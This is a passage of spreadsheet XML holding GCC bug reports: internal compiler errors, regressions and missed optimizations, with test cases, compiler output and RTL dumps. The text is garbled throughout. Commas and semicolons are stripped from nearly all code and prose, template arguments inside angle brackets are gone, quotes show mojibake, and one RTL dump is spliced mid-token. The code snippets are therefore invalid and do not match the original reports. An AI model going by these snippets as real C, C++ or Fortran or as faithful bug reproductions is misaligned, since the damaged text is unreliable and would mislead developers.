4.7 tries zero_extract:QI whereas 4.6 tried zero_extract:HI so that using QIHI mode iterator in *sbix_branch/*sbix_branch_tmp instead of HI maybe does the trick.</t>
  </si>
  <si>
    <t>GCC-58188</t>
  </si>
  <si>
    <t>ICE in gimple_add_tmp_var at gimplify.c:738</t>
  </si>
  <si>
    <t>The following code causes an ICE:
============ test.cc =============
struct B {}
struct A
{
  A( B )
}
struct Bar
{
  template
  struct Foo
  {
    A z = B()
    unsigned value
    Foo(): value( v ) {}
  }
  struct Baz
  {
    Foo foo1
    Foo foo3
  }
}
Bar::Baz baz
===============================
$ g++-4.8 -c -std=c++11 test.cc 
test.cc: In constructor â€˜Bar::Foo::Foo() [with unsigned int v = 1u]â€™:
test.cc:14:21: internal compiler error: in gimple_add_tmp_var at gimplify.c:738
     Foo(): value( v ) {}
                     ^
...
P.S. This might possibly be related to bug 58187.</t>
  </si>
  <si>
    <t>dragonroot</t>
  </si>
  <si>
    <t>GCC-67841</t>
  </si>
  <si>
    <t>error: unable to find a register to spill if all registers are callee-saved</t>
  </si>
  <si>
    <t>[hjl@gnu-tools-1 interrupt-1]$ cat y.i
typedef float xmm_t __attribute__ ((__vector_size__ (16)))
extern xmm_t x y
void
__attribute__((no_caller_saved_registers))
fn (void)
{
  x = __builtin_ia32_addss (x y)
}
[hjl@gnu-tools-1 interrupt-1]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ -O2  y.i
y.i: In function â€˜fnâ€™:
y.i:10:1: error: unable to find a register to spill
 }
 ^
y.i:10:1: error: this is the insn:
(insn 6 12 13 2 (set (reg:V4SF 92)
        (vec_merge:V4SF (plus:V4SF (reg:V4SF 92)
                (mem/c:V4SF (symbol_ref:DI (y) [flags 0x40] ) [1 y+0 S16 A128]))
            (reg:V4SF 92)
            (const_int 1 [0x1]))) y.i:9 1410 {sse_vmaddv4sf3}
     (expr_list:REG_EQUIV (mem/c:V4SF (symbol_ref:DI (x) [flags 0x40] ) [1 x+0 S16 A128])
        (nil)))
y.i:10:1: internal compiler error: in assign_by_spills at lra-assigns.c:1431
0xceef23 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/export/gnu/import/git/sources/gcc/gcc/rtl-error.c:109
0xbb54ba assign_by_spills
	/export/gnu/import/git/sources/gcc/gcc/lra-assigns.c:1431
0xbb5e1d lra_assign()
	/export/gnu/import/git/sources/gcc/gcc/lra-assigns.c:1606
0xbaf6f7 lra(_IO_FILE*)
	/export/gnu/import/git/sources/gcc/gcc/lra.c:2343
0xb5c4f5 do_reload
	/export/gnu/import/git/sources/gcc/gcc/ira.c:5391
0xb5c8a8 execute
	/export/gnu/import/git/sources/gcc/gcc/ira.c:5562
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[hjl@gnu-tools-1 interrupt-1]$</t>
  </si>
  <si>
    <t>GCC-61564</t>
  </si>
  <si>
    <t>#pragma GCC optimize (-fno-lto) causes the compiler to crash</t>
  </si>
  <si>
    <t>$ cat test.cpp
#pragma GCC push_options
#pragma GCC optimize (-fno-lto)
int main(void){return 0}
#pragma GCC pop_options
### GCC 4.9.0 ###
$ LC_ALL=C gcc test.cpp -flto 
test.cpp:4:24: internal compiler error: Segmentation fault
 #pragma GCC pop_options
                        ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccpuDCNO.out file please attach this to your bugreport.
### GCC 4.6.4 ###
$ LC_ALL=C gcc-4.6 test.cpp -flto # no crash</t>
  </si>
  <si>
    <t>t.poechtrager</t>
  </si>
  <si>
    <t>GCC-82285</t>
  </si>
  <si>
    <t>[6 Regression] Optimizing error when using enumeration</t>
  </si>
  <si>
    <t>Created attachment 42218
testcase
The attached code initializes the data array wrong when using enumerations.
If the code is changed to use integers it works.
It also works if during initialization a printf is done.
The code aborts if compiled with: gcc -O3 tst.c -o tst ./tst
The code works if compiled with: gcc -O3 tst.c -o tst -DPRINT ./tst
De code also works if compiled with -O2.</t>
  </si>
  <si>
    <t>GCC-72832</t>
  </si>
  <si>
    <t>[6/7 Regression] [OOP] ALLOCATE with SOURCE fails to allocate requested dimensions</t>
  </si>
  <si>
    <t>If I try to allocate a polymorphic variable with a specific dimension I do not get the expected result. See this example:
program allocate_source
  type :: t
  end type t
  type extends(t) :: tt
  end type tt
  class(t) allocatable dimension(:) :: a b
  allocate(tt::a(1:2))
  write(**) size(a1)
  allocate(b(1:4) source=a)
  write(**) size(b1)
end program allocate_source
Which produces as output
2
2
While I expect the second line to be 4.</t>
  </si>
  <si>
    <t>daanvanvugt</t>
  </si>
  <si>
    <t>GCC-55636</t>
  </si>
  <si>
    <t>[4.8 Regression] Fortran name mangling collides with user namespace</t>
  </si>
  <si>
    <t>As reported in early October a patch added name mangling to some additional symbols. The mangling is wrong for a number of reasons:
1) It conflicts with naming used in some systems (AIX)
2) It does not obey NO_DOT_IN_LABEL
3) It does not use identifiers reserved to the system
A proposal to use _F prefix instead of . was proposed and discussed but there has been no progress.</t>
  </si>
  <si>
    <t>GCC-1667</t>
  </si>
  <si>
    <t>Internal compiler error while compiling Linux/alpha kernel</t>
  </si>
  <si>
    <t>Internal compiler error in reload at reload1.c:1093
Release:
2.97 20010115 (experimental)
Environment:
System: Linux ludwig-alpha 2.4.0-test9 #7 Tue Oct 17 13:42:13 CEST 2000 alpha unknown
Architecture: alpha
host: alphaev56-unknown-linux-gnu
build: alphaev56-unknown-linux-gnu
target: alphaev56-unknown-linux-gnu
configured with: ../gcc/configure --prefix=/usr --enable-shared --enable-threads --with-system-zlib alphaev56-unknown-linux-gnu
How-To-Repeat:
Compile using:
gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -O2
  -fomit-frame-pointer -fno-strict-aliasing -pipe -mno-fp-regs -ffixed-8
  -mcpu=ev56 -Wa-mev6    -c -o aic7xxx.o aic7xxx.c
aic7xxx.c: In function `aic7xxx_load_seeprom':
aic7xxx.c:9381: Internal compiler error in reload at reload1.c:1093
Please submit a full bug report.
 See  for instructions.</t>
  </si>
  <si>
    <t>GCC-57459</t>
  </si>
  <si>
    <t>[4.8 Regression] LRA inheritance bug</t>
  </si>
  <si>
    <t>Created attachment 30218
small testcase
To reproduce the bug on using 1.c attached: 
Target: x86_64-unknown-linux-gnu
gcc version 4.9.0 20130529 (experimental) (GCC)
$~/workarea/gcc-r199418/build/install/bin/gcc -fno-inline -O2 -minline-all-stringops -fno-omit-frame-pointer -m32 1.c
$./a.out
len = 9
$~/workarea/gcc-r199418/build/install/bin/gcc -O2 -m32 1.c
$./a.out
len = 8
The expanded __builtin_strlen is wrong:
 80484c3:       8b 07                   mov    (%edi)%eax
 80484c5:       83 c7 04                add    $0x4%edi
 80484c8:       8d 90 ff fe fe fe       lea    -0x1010101(%eax)%edx
 80484ce:       f7 d0                   not    %eax
 80484d0:       21 c2                   and    %eax%edx
 80484d2:       81 e2 80 80 80 80       and    $0x80808080%edx
 80484d8:       74 e9                   je     80484c3 
 80484da:       89 d0                   mov    %edx%eax
 80484dc:       8b 55 ec                mov    -0x14(%ebp)%edx
 80484df:       89 55 e8                mov    %edx-0x18(%ebp)
 80484e2:       89 c2                   mov    %eax%edx
 80484e4:       c1 e8 10                shr    $0x10%eax
 80484e7:       f7 c2 80 80 00 00       test   $0x8080%edx
 80484ed:       89 45 ec                mov    %eax-0x14(%ebp)
 80484f0:       89 d0                   mov    %edx%eax
 80484f2:       8d 57 02                lea    0x2(%edi)%edx
 80484f5:       0f 44 fa                cmove  %edx%edi
 80484f8:       8b 55 e8                mov    -0x18(%ebp)%edx
 80484fb:       0f 44 45 ec             cmove  -0x14(%ebp)%eax
 80484ff:       00 45 e4                add    %al-0x1c(%ebp)   ====&gt; Wrong here the correct insn is: add %al %al. %al is either 0x80 or 0x0 here. The insn add  %al %al is used to check whether %al is 0x80 and it will produce carry bit for the following sbb. (The lowest 0x80 in %eax shows where the first '\0' is in the input string)
 8048502:       83 df 03                sbb    $0x3%edi
 8048505:       8b 45 08                mov    0x8(%ebp)%eax
 8048508:       2b 7d 08                sub    0x8(%ebp)%edi
The IR after IRA and before LRA:
(insn 51 50 52 12 (parallel [
            (set (reg:CC 17 flags)
                (unspec:CC [
                        (subreg:QI (reg:SI 79) 0)
                        (subreg:QI (re(insn 292 50 51 12 (set (reg:QI 118)
        (subreg:QI (reg:SI 79) 0)) 1.c:16 87 {*movqi_internal}
     (nil))
(insn 51 292 52 12 (parallel [
            (set (reg:CC 17 flags)
                (unspec:CC [
                        (subreg:QI (reg:SI 79) 0)
                        (reg:QI 118)
                    ] UNSPEC_ADD_CARRY))
            (set (subreg:QI (reg:SI 79) 0)
                (plus:QI (subreg:QI (reg:SI 79) 0)
                    (reg:QI 118)))
        ]) 1.c:16 259 {addqi3_cc}
     (expr_list:REG_UNUSED (reg:SI 79)
        (nil)))g:SI 79) 0)
                    ] UNSPEC_ADD_CARRY))
            (set (subreg:QI (reg:SI 79) 0)
                (plus:QI (subreg:QI (reg:SI 79) 0)
                    (subreg:QI (reg:SI 79) 0)))
        ]) 1.c:16 259 {addqi3_cc}
     (expr_list:REG_UNUSED (reg:SI 79)
        (nil)))
The IR is correct till now. insn 51 will produce the problematic add %al-0x1c(%ebp) finally. All the input and output operands of insn 51 are reg79. The reg79 gets no hardreg in IRA phase.  
The IR after lra_constraints:
(insn 292 50 51 12 (set (reg:QI 118)
        (subreg:QI (reg:SI 79) 0)) 1.c:16 87 {*movqi_internal}
     (nil))
(insn 51 292 52 12 (parallel [
            (set (reg:CC 17 flags)
                (unspec:CC [
                        (subreg:QI (reg:SI 79) 0)
                        (reg:QI 118)
                    ] UNSPEC_ADD_CARRY))
            (set (subreg:QI (reg:SI 79) 0)
                (plus:QI (subreg:QI (reg:SI 79) 0)
                    (reg:QI 118)))
        ]) 1.c:16 259 {addqi3_cc}
     (expr_list:REG_UNUSED (reg:SI 79)
        (nil)))
The IR is still correct. 
The choosen constraints of insn 51 are rm 0 rn. reg79 get no hardreg in IRA so the output operand and the first input operand satisfy the constraint (staying in mem) but the second input operand should stay in register. That is why reg118 is introduced and insn 292 is inserted. 
The IR after lra_inheritance:
(insn 289 47 48 12 (set (reg:SI 116 [79])
        (reg:SI 121 [79])) 1.c:16 85 {*movsi_internal}
     (nil))
(insn 48 289 290 12 (set (reg:SI 116 [79])
        (if_then_else:SI (eq (reg:CCNO 17 flags)
                (const_int 0 [0]))
            (reg:SI 122 [83])
            (reg:SI 116 [79]))) 1.c:16 923 {*movsicc_noc}
     (expr_list:REG_DEAD (reg:SI 122 [83])
        (nil)))
(insn 290 48 294 12 (set (reg:SI 120 [79])
        (reg:SI 116 [79])) 1.c:16 85 {*movsi_internal}
     (nil))
......
(insn 292 50 51 12 (set (reg:QI 118)
        (subreg:QI (reg:SI 120 [79]) 0)) 1.c:16 87 {*movqi_internal}
     (nil))
(insn 51 292 52 12 (parallel [
            (set (reg:CC 17 flags)
                (unspec:CC [
                        (subreg:QI (reg:SI 79) 0)
                        (reg:QI 118)
                    ] UNSPEC_ADD_CARRY))
            (set (subreg:QI (reg:SI 79) 0)
                (plus:QI (subreg:QI (reg:SI 79) 0)
                    (reg:QI 118)))
        ]) 1.c:16 259 {addqi3_cc}
     (expr_list:REG_UNUSED (reg:SI 79)
        (nil)))
The IR is incorrect here. 
The reg79 in insn 292 get a reload reg to reuse so it is changed to reg120. But the reg79 in insn 51 doesn't change accordingly. It is the cause of the problem. If all the reg79 do the reload reg reuse then the problem will not happen.  
In inherit_in_ebb called by lra_inheritance those pesudo reg which doesn't get hardreg and those with reg_type == OP_IN are considered as candidates to reuse previous reload regs (lra-constraints.c:4892 r199418). For reg79 in insn 292 it has no hardreg and its type is OP_IN so it is choosen and replaced by reg120 but for reg79 in insn 51 its type is OP_INOUT so it is not choosen. I guess OP_INOUT should also be included into the candidate choosing conditions but I am not sure.</t>
  </si>
  <si>
    <t>GCC-20978</t>
  </si>
  <si>
    <t>Failure to detect unhandled exception</t>
  </si>
  <si>
    <t>In some cases GCJ fails to detect unhandled exceptions. In the code below the
method x() is invalid because FileChannel.close() can throw an IOException. GCJ
should report an error stating that the exception must be caught or declared to
be thrown.
import java.nio.channels.*
public class FCIO
{
  FileChannel fc
  public void x()
  {
    fc.close()
  }
}</t>
  </si>
  <si>
    <t>GCC-53443</t>
  </si>
  <si>
    <t>Bad Macro Definition SUBSUBTARGET_OVERRIDE_OPTIONS in vxworks.h</t>
  </si>
  <si>
    <t>Created attachment 27467
Proposed Fix (against trunk)
I put the bug down as 4.8 but it's off of the latest trunk (cloned from the git mirror) - I'm not sure what version that is.
The issue presents itself when compiling with a vxworks target.
SUBSUBTARGET_OVERRIDE_OPTIONS in gcc/config/rs6000/vxworks.h was using the do { /*...*/ } while (0) idiom as a macro but did not have the opening do { thus the block was ended and the compiler barfed.
A patch is attached that fixes the issue.  I just used git format-patch - if the format is wrong I can use diff.
Also please tell me if I should email gcc-patches.</t>
  </si>
  <si>
    <t>GCC-31749</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid redeclaration of builtin</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers a segfault since GCC 3.1:
========================
namespace std
{
  union abort
}
void abort()
using std::abort
========================
bug.cc:8: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Compiling the code with -fno-builtin yields:
bug.cc:8: error: 'abort' is already declared in this scope
A slightly different testcase triggers the following ICE:
========================
namespace std
{
  union abort
}
union abort
using std::abort
========================
bug.cc:8: internal compiler error: tree check: expected class 'type' have 'declaration' (type_decl) in comptypes at cp/typeck.c:1115
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>aaw</t>
  </si>
  <si>
    <t>GCC-35776</t>
  </si>
  <si>
    <t>Simple loop isn't optimized well</t>
  </si>
  <si>
    <t>I have a C code:
void f()
void i(unsigned n) {
  while (n-- &gt; 0) {
    f()
  }
}
Which when compiled with -O3 on i586 produces the assembly:
i:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %esi
        movl    8(%ebp) %esi
        pushl   %ebx
        testl   %esi %esi
        je      .L5
        xorl    %ebx %ebx
        .p2align 47
.L4:
        addl    $1 %ebx
        call    f
        cmpl    %esi %ebx
        jne     .L4
.L5:
        popl    %ebx
        popl    %esi
        popl    %ebp
        ret
And obviously shorter assembly with one less instruction in the loop is:
i:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %esi
        movl    8(%ebp) %esi
        testl   %esi %esi
        je      .L5
        .p2align 47
.L4:
        call    f
        dec     %esi
        jl      .L4
.L5:
        popl    %esi
        popl    %ebp
        ret
This is a very short and basic loop occurring in programs many times.
That's why this should be optimized very well.</t>
  </si>
  <si>
    <t>GCC-69133</t>
  </si>
  <si>
    <t>[6 Regression] LTO segfault in lto_get_decl_name_mapping() on 483.xalancbmk with -flto-partition=none</t>
  </si>
  <si>
    <t>483.xalancbmk from SPEC CPU2006 fails to build with -flto -flto-partitions=none
Trace: 
lto1: internal compiler error: Segmentation fault
0xa4432f crash_signal
    ../../gcc/gcc/toplev.c:334
0x90f748 lto_get_decl_name_mapping(lto_file_decl_data* char const*)
    ../../gcc/gcc/lto-section-in.c:352
0x690659 cgraph_node::get_untransformed_body()
    ../../gcc/gcc/cgraph.c:3256
0x69aa45 cgraph_node::expand_thunk(bool bool)
    ../../gcc/gcc/cgraphunit.c:1604
0x69bd92 cgraph_node::assemble_thunks_and_aliases()
    ../../gcc/gcc/cgraphunit.c:1904
0x69bd65 cgraph_node::assemble_thunks_and_aliases()
    ../../gcc/gcc/cgraphunit.c:1922
0x69bfaf cgraph_node::expand()
    ../../gcc/gcc/cgraphunit.c:2034
0x69d826 expand_all_functions
    ../../gcc/gcc/cgraphunit.c:2107
0x69d826 symbol_table::compile()
    ../../gcc/gcc/cgraphunit.c:2463
0x60cc87 lto_main()
    ../../gcc/gcc/lto/lto.c:3327
Segfaults on symbol _ZThn8_N10xalanc_1_819XercesParserLiaison11resetErrorsEv
demangler.com says the symbol is
non-virtual thunk to xalanc_1_8::XercesParserLiaison::resetErrors()
For this symbol ./-lm.res has lto resolution == PREVAILING_DEF_IRONLY.
Gating cgraph_node::get_untrasnformed_body on lto_file_data seems to
work (also passing bootstrap and test) however I wonder if that's the correct approach ?
Thanks
Prathamesh</t>
  </si>
  <si>
    <t>GCC-66232</t>
  </si>
  <si>
    <t>-fPIC -fno-plt -mx32 fails to generate indirect branch via GOT</t>
  </si>
  <si>
    <t>[hjl@gnu-tools-1 plt-1]$ cat x.i
extern void bar (void)
void
foo (void)
{
  bar ()
}
[hjl@gnu-tools-1 plt-1]$ make
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -O2 -fPIC -fno-plt -mx32 -S x.i
[hjl@gnu-tools-1 plt-1]$ cat x.s
	.file	x.i
	.section	.text.unlikelyax@progbits
.LCOLDB0:
	.text
.LHOTB0:
	.p2align 415
	.globl	foo
	.type	foo @function
foo:
.LFB0:
	.cfi_startproc
	movl	bar@GOTPCREL(%rip) %eax
	jmp	*%rax
	.cfi_endproc
.LFE0:
	.size	foo .-foo
	.section	.text.unlikely
.LCOLDE0:
	.text
.LHOTE0:
	.ident	GCC: (GNU) 6.0.0 20150521 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-tools-1 plt-1]$ 
We should generate
jmp	*bar@GOTPCREL(%rip)
since GOT slot is 64-bit.</t>
  </si>
  <si>
    <t>GCC-54519</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Debug info quality regression due to (pointless) partial inlining</t>
  </si>
  <si>
    <t>extern void bar (int)
static int
foo (int x int y)
{
  if (x)
    {
      bar (x)
      bar (x)
      bar (x)
      bar (x)
      bar (x)
    }
  return y
}
#ifndef INL
void *p = (void *) foo
#else
int
baz1 (int x int y)
{
  return foo (x y)
}
int
baz2 (int x int y)
{
  return foo (x y)
}
#endif
at -g -O2 results in partial inlining (even when without -DINL it has no callers at all can that be changed?) and immediately inlining it back.  In 4.7 (before
http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=188981
change) in debuginfo we actually end up with terribly confusing DW_TAG_inlined_subroutine of the same abstract origin as the current function r188981 improves that slightly so it is actually DW_TAG_lexical_block instead.
But still for one of the parameters we end up with unnecessary another location list for it (it would be nice if we could merge them) and more importantly for the second parameter we end up with another DW_TAG_variable with abstract origin of its origin but actually no location list at all.
This is the main reason why this PR is filed.
The VAR_DECL is created by copy_arguments_for_versioning with copy_decl_to_var there just in case the var would be used as local temporary.  It isn't used in this case so it ends up with no location at all (we want to use the location of the outer argument in that case) if it was used as a local temporary we'd still want to use the outer parameter location before it is initialized.
And completely another case is when foo.part.N isn't inlined back -g -O2 -DINL
shows that case.  Then y still doesn't have any location info.
Either we could make inlining smarter about the case where fnsplitted function is being inlined back into the main body (essentially try to remap the inline fn parameter or these special outer block vars back to the outer function's parameters or variables) or perhaps at least add a debug source stmt at the beginning of the foo.part.* which would say that the special var created by copy_arguments_for_versioning lives in the caller's parameter (like we do for say IPA cp).</t>
  </si>
  <si>
    <t>GCC-34133</t>
  </si>
  <si>
    <t>Bind(cname=) should be rejected for dummies F2008: allow bind(c) for internal procs</t>
  </si>
  <si>
    <t>C1237 (R1225) A proc-language-binding-spec shall not be specified for an internal procedure.
However gfortran accepts the following:
subroutine foo()
contains
  subroutine bar() bind (c)
  end subroutine bar
end subroutine foo
program main
  use iso_c_binding
  implicit none
contains
  subroutine test(c) bind(c)
    character(len=1kind=c_char) :: c
  end subroutine test
end program main</t>
  </si>
  <si>
    <t>GCC-44332</t>
  </si>
  <si>
    <t>ICE: in copy_to_mode_reg at explow.c:623 with -mno-sse2</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -mno-sse2 testcase.c
testcase.c: In function 'foo':
testcase.c:6:6: internal compiler error: in copy_to_mode_reg at explow.c:635
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r160048 - crash
r153685 - crash
4.4 r158133 - crash
----- testcase.c -----
typedef __attribute__((vector_size(16))) char type
extern void bar(type)
void foo(type x) { bar(x) }
----------------------
A bit different testcase gives:
$ gcc -mno-sse2 testcase2.c
testcase2.c: In function 'foo':
testcase2.c:4:29: internal compiler error: in emit_move_insn at expr.c:3428
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----- testcase2.c -----
typedef __attribute__((vector_size(16))) char type
extern void bar(type)
void foo(void) { type x bar(x) }
-----------------------</t>
  </si>
  <si>
    <t>GCC-22298</t>
  </si>
  <si>
    <t>libgfortran init() constructor isn't called if executable is statically linked</t>
  </si>
  <si>
    <t>$ cat a_fortran.f90                   
  subroutine f
    print * '##'
  end
$ gfortran -c a_fortran.f90
$ cat a.c 
extern void f_(void)
int main (void)
{
  f_ ()
}
$ ./irun/bin/gcc -c a.c 
$ gfortran -static a.o a_fortran.o &amp;&amp; ./a.out
Fortran runtime error: End of record
$ gfortran a.o a_fortran.o &amp;&amp; ./a.out
 ##
This happens because the init() constructor (libgfortran/runtime/main.c) is not
called when a.out is executed if it was linked statically.
According to Andrew one way to make sure that init() is called is to reference
it in an object file we're sure will be used. I'm thinking of runtime/error.c.</t>
  </si>
  <si>
    <t>GCC-71105</t>
  </si>
  <si>
    <t>[6/7 regression] lambdas with default captures improperly have function pointer conversions</t>
  </si>
  <si>
    <t>Created attachment 38483
Minimal test case
N4582 [expr.prim.lambda]/7 says:
The closure type for a non-generic lambda-expression with no lambda-capture has a conversion function to pointer to function with C++ language linkage (7.5) having the same parameter and return types as the closure typeâ€™s function call operator. ... For a generic lambda with no lambda-capture the closure type has a conversion function template to pointer to function. The conversion function template has the same invented template-parameter-list and the pointer to function has the same parameter types as the function call operator template. ...
So all of:
    static_cast([]{})
    static_cast([](auto){})
    static_cast([](auto x){ return x })
should compile. These should all be ill-formed since the lambdas have lambda-captures:
    static_cast([i]{})
    static_cast([=]{})
    static_cast([
    static_cast([i](auto){})
    static_cast([=](auto){})
    static_cast([
    static_cast([i](auto x){ return x })
    static_cast([=](auto x){ return x })
    static_cast([ })
clang (tested 3.4 - 3.9 all versions that implement generic lambdas) diagnoses all of these conversions as ill-formed gcc (4.9.0 - 6.1.0 again all versions that implement generic lambdas) diagnoses only those with explicit captures.
This issue is significant when a library composes function objects via private inheritance to take advantage of the empty base optimization and it adapts a (possibly) underconstrained generic lambda to a different/larger valid space of parameter types. For example from range-v3:
    #include 
    template 
    struct indirected : F {
        indirected(F f) : F(f) {}
        template 
        auto operator()(I i) -&gt; decltype(std::declval()(*i)) {
            return static_cast&lt;F
        }
    }
    int main() {
        auto f = [=](auto i) { return i + i }
        auto i = indirected{f}
        static_assert(std::is_same())) int&gt;() )
    }
This program compiles correctly with the GCC 4.9 and 5 series compilers 6.1 diagnoses the static_assert line (See http://melpon.org/wandbox/permlink/yy61pk0iJRfUVBya):
prog.cc: In instantiation of 'main():: [with auto:1 = int*]':
prog.cc:13:24:   required by substitution of 'template main()::::operator decltype (((main()::)0u).operator()(static_cast())) (*)(auto:1)() const [with auto:1 = int*]'
prog.cc:15:63:   required from here
prog.cc:13:37: error: invalid operands of types 'int*' and 'int*' to binary 'operator+'
     auto f = [=](auto i) { return i + i }
                                   ~~^~~</t>
  </si>
  <si>
    <t>GCC-41165</t>
  </si>
  <si>
    <t>-std=f95: Reject PRODUCT in initialization expressions.</t>
  </si>
  <si>
    <t>Since PR 25104 and PR 29962 gfortran allows PRODUCT in initialization expressions (2009-06-07) however using -std=f95 PRODUCT is still accepted.
Expected: Print an error when using -std=f95.
INTEGER PARAMETER :: d = 4 ! Number of elements to permute
INTEGER :: I
INTEGER PARAMETER :: maxnum = PRODUCT((/(ii=1d)/))
print * maxnum
end</t>
  </si>
  <si>
    <t>GCC-6660</t>
  </si>
  <si>
    <t>Typedeffed unnamed structs/unions do not compile with gcc-3.1</t>
  </si>
  <si>
    <t>This is regarding gcc-3.1: Sorry can't give more details about the gcc version but several users of gcc-3.1 have now complained to us that they cannot compile 2.5.12 and above kernels with gcc-3.1 because of this. (2.5.12 is when the new ntfs driver was introduced which uses the unnamed structs/unions.)
gcc-3.1 gives the error: unnamed fields of type other than struct or union are not allowed
However the unnamed field is a typedeffed unnamed struct/union (we have both in the code).
e.g. the first error during kernel 2.5.15 compilation hits fs/ntfs/aops.c in the include file fs/ntfs/layout.h:
gcc -D__KERNEL__ -I/usr/src/linux-2.5.15/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686  -DNTFS_VERSION=\2.0.6\ -DDEBUG -DKBUILD_BASENAME=aops  -c -o aops.o aops.c
In file included from attrib.h:31
                 from debug.h:31
                 from ntfs.h:43
                 from aops.c:30:
layout.h:299: unnamed fields of type other than struct or union are not allowed
What it is complaining about is this code in layout.h:
typedef struct {
        NTFS_RECORD_TYPES magic // this is an enumeration
        u16 usa_ofs
        u16 usa_count
} __attribute__ ((__packed__)) NTFS_RECORD
typedef struct {
        NTFS_RECORD  // this is line 299 on which gcc barfs
        blah...
} __attribute__ ((__packed__)) MFT_RECORD
Clearly this code is just fine and it used to work with gcc-2.96 and gcc-3.0.x.
I believe this is a bug in gcc-3.1 causing it to not understand that NTFS_RECORD is actually a struct/union just a typedeffed one but all the same. Having to keep typing struct NTFS_RECORD is silly hence why I typedef everything.
If this is not a bug but a feature than I would kindly request that you remove that feature and restore the old behaviour present in gcc-2.96 and gcc-3.0.x...
(Yes I know gcc-2.96 is not an official gcc release so no need to rant about that.)
I would appreciate your comments on this...
Best regards
       Anton
-- 
Anton Altaparmakov  (replace at with @)
Linux NTFS Maintainer / IRC: #ntfs on irc.openprojects.net
WWW: http://linux-ntfs.sf.net/ &amp; http://www-stu.christs.cam.ac.uk/~aia21/
Release:
gcc 3.1
Environment:
Linux compiling Linux kernel 2.5.15 (same applies since kernel version 2.5.11)</t>
  </si>
  <si>
    <t>aia21</t>
  </si>
  <si>
    <t>GCC-13663</t>
  </si>
  <si>
    <t>[3.3 regression] gcc segfaults on invalid use of member</t>
  </si>
  <si>
    <t>I get a segfault with g++ on one file when using 3.3.2 this does not occur 
when using 3.2.x. 
The command: 
richard@deusexmachina:kbudget$ g++ -DHAVE_CONFIG_H -I. 
-I/home/richard/projects/kbudget/kbudget -I.. -I/usr/kde/3.2/include 
-I/usr/qt/3/include -I/usr/X11R6/include -DQT_THREAD_SUPPORT -D_REENTRANT 
-Wnon-virtual-dtor -Wno-long-long -Wundef -Wall -W -Wpointer-arith 
-Wwrite-strings -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align 
-Wconversion -Wchar-subscripts -O2 -g3 -Wformat-security 
-Wmissing-format-attribute -fno-exceptions -fno-check-new -fno-common 
-fexceptions -c -o ktransactionsearchdlg.o ktransactionsearchdlg.cpp 
g++: Internal error: Segmentation fault (program cc1plus) 
Please submit a full bug report. 
See  for instructions. 
The version: 
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/specs 
Configured with: /var/tmp/portage/gcc-3.3.2-r5/work/gcc-3.3.2/configure 
--prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.3 
--includedir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include 
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3 
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/man 
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/info --enable-shared 
--host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --with-system-zlib 
--enable-languages=cc++f77objcjava --enable-threads=posix 
--enable-long-long --disable-checking --enable-cstdio=stdio 
--enable-clocale=generic --enable-__cxa_atexit 
--enable-version-specific-runtime-libs 
--with-gxx-include-dir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3 
--with-local-prefix=/usr/local --enable-shared --enable-nls 
--without-included-gettext --x-includes=/usr/X11R6/include 
--x-libraries=/usr/X11R6/lib --enable-interpreter --enable-java-awt=xlib 
--with-x --disable-multilib 
Thread model: posix 
gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5 propolice-3.3-7)</t>
  </si>
  <si>
    <t>GCC-31297</t>
  </si>
  <si>
    <t>Use of uninitialized variables in libgfortran's I/O</t>
  </si>
  <si>
    <t>Found using valgrind:
gfortran gfortran.dg/backspace_5.f
valgrind ./a.out
==15340== Syscall param write(buf) points to uninitialised byte(s)
==15340==    at 0x56000C0: __write_nocancel (in /lib64/libc-2.5.so)
==15340==    by 0x4EBEE90: do_write (unix.c:336)
==15340==    by 0x4EBEF31: fd_flush (unix.c:386)
==15340==    by 0x4EBCBF6: _gfortran_st_write_done (transfer.c:2762)
==15340==    by 0x400BAB: MAIN__ (in /projects/tob/gcc/gcc/testsuite/gfortran.dg/a.out)
==15340==    by 0x40104B: main (fmain.c:22)
Similarly for:
- backspace_6.f
- write_back.f
- write_rewind_1.f
- write_rewind_2.f
- char_bounds_check_fail_1.f90
- direct_io_2.f90
- unf_io_convert_3.f90</t>
  </si>
  <si>
    <t>GCC-32112</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] #'unbound_class_template' not supported by dump_decl#</t>
  </si>
  <si>
    <t>A garbled diagnostic is issued for the following invalid code snippet
since GCC 4.1.0:
====================================================
template struct A
template void foo (A&lt;
====================================================
bug.cc:3: error: '#'unbound_class_template' not supported by dump_decl#' is not a template</t>
  </si>
  <si>
    <t>GCC-1204</t>
  </si>
  <si>
    <t>Definite assignment problem</t>
  </si>
  <si>
